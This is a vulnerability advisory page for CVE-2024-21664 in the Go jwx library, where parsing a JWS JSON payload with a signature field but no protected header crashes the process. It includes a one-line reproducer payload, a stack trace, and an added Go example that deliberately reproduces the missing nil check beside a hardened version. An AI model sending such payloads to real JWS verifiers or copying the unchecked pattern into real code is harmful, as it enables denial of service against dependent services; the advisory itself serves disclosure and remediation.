Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So
Parsing JSON serialized payload without protected field can lead to segfault
Summary
Calling jws.Parse with a JSON serialized payload where the signature field is present while protected is absent can lead to a nil pointer dereference.
Details
This seems to also affect other functions that call Parse internally, like jws.Verify.
My understanding of these functions from the docs is that they are supposed to fail gracefully on invalid input and don't require any prior validation.
Based on the stack trace in the PoC, the issue seems to be that the processing done in jws/message.go:UnmarshalJSON() assumes that if a signature field is present, then a protected field is also present. If this is not the case, then the subsequent call to getB64Value(sig.protected) will dereference sig.protected, which is nil.
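The missing nil check described above, shown as an added example that is not the jwx project's own code or its fix: a constructed stand-in type (signatureProxy, with pointer fields so an absent key decodes to nil) is decoded once the way the advisory says UnmarshalJSON did it, dereferencing protected whenever signature is present, and once with the structure validated before anything is dereferenced. The input is the advisory's reproducer payload; the type and function names are assumptions for illustration and do not correspond to jwx identifiers.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// signatureProxy is a constructed stand-in (not the jwx type) for one entry
// of a JWS JSON serialization. Both fields are pointers so that an absent key
// decodes to nil, which is what the defect hinges on.
type signatureProxy struct {
	Protected *string `json:"protected,omitempty"`
	Signature *string `json:"signature,omitempty"`
}

// errMissingProtected is returned by hardenedParse when "signature" is present
// but "protected" is not.
var errMissingProtected = errors.New("jws: signature present but protected header missing")

// vulnerableParse reproduces the defective pattern the advisory describes:
// once a "signature" key is seen it assumes "protected" is present too and
// dereferences the pointer without a nil check.
func vulnerableParse(data []byte) (string, error) {
	var p signatureProxy
	if err := json.Unmarshal(data, &p); err != nil {
		return "", err
	}
	if p.Signature != nil {
		return *p.Protected, nil // nil pointer dereference when "protected" is absent
	}
	return "", errors.New("jws: missing signature")
}

// hardenedParse validates the structure before dereferencing anything, so
// malformed input is reported as an error instead of crashing the process.
func hardenedParse(data []byte) (string, error) {
	var p signatureProxy
	if err := json.Unmarshal(data, &p); err != nil {
		return "", err
	}
	if p.Signature == nil {
		return "", errors.New("jws: missing signature")
	}
	if p.Protected == nil {
		return "", errMissingProtected
	}
	return *p.Protected, nil
}

// panics reports whether fn panics; it is used to show that the vulnerable
// path crashes on the advisory's reproducer payload.
func panics(fn func()) (didPanic bool) {
	defer func() {
		if recover() != nil {
			didPanic = true
		}
	}()
	fn()
	return false
}

func main() {
	// The advisory's reproducer payload: a signature with no protected header.
	input := []byte(`{"signature": ""}`)
	fmt.Println("vulnerable path panics:", panics(func() { _, _ = vulnerableParse(input) }))
	_, err := hardenedParse(input)
	fmt.Println("hardened path error:", err)
}
```

The point of the hardened form is that a parser fed untrusted input must treat every optional field as optional until it has checked it; a caller that only wraps Parse in an error check, as the PoC does, has no chance to handle a panic raised inside the decoder.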
PoC
Reproducer:
package poc

import (
	"testing"

	"github.com/lestrrat-go/jwx/v2/jws"
)

func TestPOC(t *testing.T) {
	_, _ = jws.Parse([]byte(`{"signature": ""}`))
}
Result:
$ go test
--- FAIL: TestPOC (0.00s)
panic: runtime error: invalid memory address or nil pointer dereference [recovered]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x40 pc=0x5fd618]
goroutine 6 [running]:
testing.tRunner.func1.2({0x628800, 0x831030})
/usr/local/go/src/testing/testing.go:1545 +0x238
testing.tRunner.func1()
/usr/local/go/src/testing/testing.go:1548 +0x397
panic({0x628800?, 0x831030?})
/usr/local/go/src/runtime/panic.go:914 +0x21f
github.com/lestrrat-go/jwx/v2/jws.getB64Value({0x0?, 0x0?})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/jws/jws.go:484 +0x18
github.com/lestrrat-go/jwx/v2/jws.(*Message).UnmarshalJSON(0xc0000a2140, {0xc0000ec000, 0x11, 0x200})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/jws/message.go:323 +0x4ad
encoding/json.(*decodeState).object(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0x16?})
/usr/local/go/src/encoding/json/decode.go:604 +0x6cc
encoding/json.(*decodeState).value(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0xc00006e630?})
/usr/local/go/src/encoding/json/decode.go:374 +0x3e
encoding/json.(*decodeState).unmarshal(0xc0000ea028, {0x64fa60?, 0xc0000a2140?})
/usr/local/go/src/encoding/json/decode.go:181 +0x133
encoding/json.(*Decoder).Decode(0xc0000ea000, {0x64fa60, 0xc0000a2140})
/usr/local/go/src/encoding/json/stream.go:73 +0x179
github.com/lestrrat-go/jwx/v2/internal/json.Unmarshal({0xc00001a288, 0x11, 0x11}, {0x64fa60, 0xc0000a2140})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/internal/json/json.go:26 +0x97
github.com/lestrrat-go/jwx/v2/jws.parseJSON({0xc00001a288, 0x11, 0x11})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/jws/jws.go:588 +0x50
github.com/lestrrat-go/jwx/v2/jws.Parse({0xc00001a288, 0x11, 0x11}, {0x0?, 0xc00006e760?, 0x48450f?})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/jws/jws.go:525 +0x89
poc.TestPOC(0x0?)
/home/fredrik/src/jwx_poc/poc_test.go:10 +0x57
testing.tRunner(0xc0000e4340, 0x68ef30)
/usr/local/go/src/testing/testing.go:1595 +0xff
created by testing.(*T).Run in goroutine 1
/usr/local/go/src/testing/testing.go:1648 +0x3ad
exit status 2
FAIL poc 0.005s
Impact
The vulnerability can be used to crash / DoS a system doing JWS verification.
Permalink: https://github.com/advisories/GHSA-pvcr-v8j8-j5q3
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 11 months ago
Updated: 10 months ago
CVSS Score: 4.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
Identifiers: GHSA-pvcr-v8j8-j5q3, CVE-2024-21664
References:
- https://github.com/lestrrat-go/jwx/security/advisories/GHSA-pvcr-v8j8-j5q3
- https://github.com/lestrrat-go/jwx/commit/0e8802ce6842625845d651456493e7c87625601f
- https://github.com/lestrrat-go/jwx/commit/d69a721931a5c48b9850a42404f18e143704adcd
- https://nvd.nist.gov/vuln/detail/CVE-2024-21664
- https://github.com/lestrrat-go/jwx/commit/8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65
- https://github.com/advisories/GHSA-pvcr-v8j8-j5q3
Blast Radius: 14.9
Affected Packages
go:github.com/lestrrat-go/jwx
Dependent packages: 1,295
Dependent repositories: 2,884
Downloads:
Affected Version Ranges: >= 1.0.8, < 1.2.28
Fixed in: 1.2.28
All affected versions: 1.0.8, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.2.15, 1.2.16, 1.2.17, 1.2.18, 1.2.19, 1.2.20, 1.2.21, 1.2.22, 1.2.23, 1.2.24, 1.2.25, 1.2.26, 1.2.27
All unaffected versions: 0.9.0, 0.9.1, 0.9.2, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.2.28, 1.2.29, 1.2.30
go:github.com/lestrrat-go/jwx/v2
Dependent packages: 439
Dependent repositories: 301
Downloads:
Affected Version Ranges: < 2.0.19
Fixed in: 2.0.19
All affected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, 2.0.16, 2.0.17, 2.0.18
All unaffected versions: 2.0.19, 2.0.20, 2.0.21, 2.1.0, 2.1.1, 2.1.2, 2.1.3